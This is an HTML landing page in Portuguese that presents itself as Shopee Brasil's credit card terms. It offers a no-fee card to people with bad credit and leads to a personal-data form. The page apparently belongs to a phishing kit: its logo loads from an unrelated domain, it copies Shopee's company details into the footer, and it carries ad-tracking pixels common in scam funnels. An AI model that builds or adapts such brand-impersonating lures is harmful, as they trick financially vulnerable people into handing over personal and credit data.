﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Termos e Condições</title>
    <link href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" rel="stylesheet">
    <link href="../npm/bootstrap%405.3.0/dist/css/bootstrap.min-1.css" rel="stylesheet">




    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->




    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            font-family: 'Inter', sans-serif;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            font-size: 1.25rem;
            font-weight: 600;
            grid-area: top-bar;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            text-align: center;
            border-radius: 12px;
            margin: 0 auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .btn-custom {
            color: #ffffff;
            border: none;
            width: 100%;
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            font-weight: 500;
            border-radius: 8px;
            padding: 1rem 2rem;
            font-size: 1rem;
            font-family: 'Inter', sans-serif;
            transition: all 0.3s ease;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #EE4D2D;
            padding: 2rem 1rem;
            position: relative;
            margin-top: 3rem;
            font-size: 0.875rem;
        }

        ul {
            list-style: none;
            padding-left: 0;
            margin-bottom: 0;
        }

        ul li {
            display: flex;
            align-items: flex-start;
            gap: 12px;
            margin-bottom: 12px;
            color: #4B5563;
            font-size: 0.95rem;
            padding: 0.5rem 0;
        }

        ul li:last-child {
            margin-bottom: 0;
        }

        .ri-check-double-line {
            color: #EE4D2D;
            font-size: 1.25rem;
            flex-shrink: 0;
            margin-top: 2px;
        }

        .terms-box {
            background-color: #FFF5F3;
            padding: 1.25rem;
            border-radius: 12px;
            text-align: left;
            border: 1px solid rgba(238, 77, 45, 0.1);
        }

        .intro-text {
            color: #393939;
            margin-bottom: 1.5rem;
            font-size: 1rem;
            line-height: 1.6;
        }

        .intro-text strong {
            color: #EE4D2D;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem auto;
            }
            
            ul li {
                font-size: 0.9rem;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">
         
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>
    
    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 40px;padding: 1.5rem;" class="main-content">
            <div id="termos" class="mb-3">
                <p class="intro-text">
                    Conta gratuita, cartão de crédito sem anuidade <strong>para negativados</strong> e muito mais. Tudo isso em um só lugar.
                </p>
                <div class="terms-box">
                    <ul>
                        <li>
                            <i class="ri-check-double-line"></i>
                            Crédito sujeito a análise e aprovação.
                        </li>
                        <li>
                            <i class="ri-check-double-line"></i>
                            Os dados fornecidos por você a seguir serão utilizados para o processo de aquisição do cartão de crédito.
                        </li>
                        <li>
                            <i class="ri-check-double-line"></i>
                            Autorizo a consulta ao SCR - Sistema de Crédito do Banco Central e aos cadastros e órgãos de proteção ao crédito.
                        </li>
                    </ul>
                </div>
                <button class="btn btn-custom mt-4" onclick="location.href='../personal/index.php.html'">
                    Li e concordo com os termos
                </button>
            </div>
        </div>
    </div>    

    <div class="footer" id="footerChg">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>

</div>


<script src="../npm/bootstrap%405.3.0/dist/js/bootstrap.bundle.min-1.js"></script>
</body>
</html>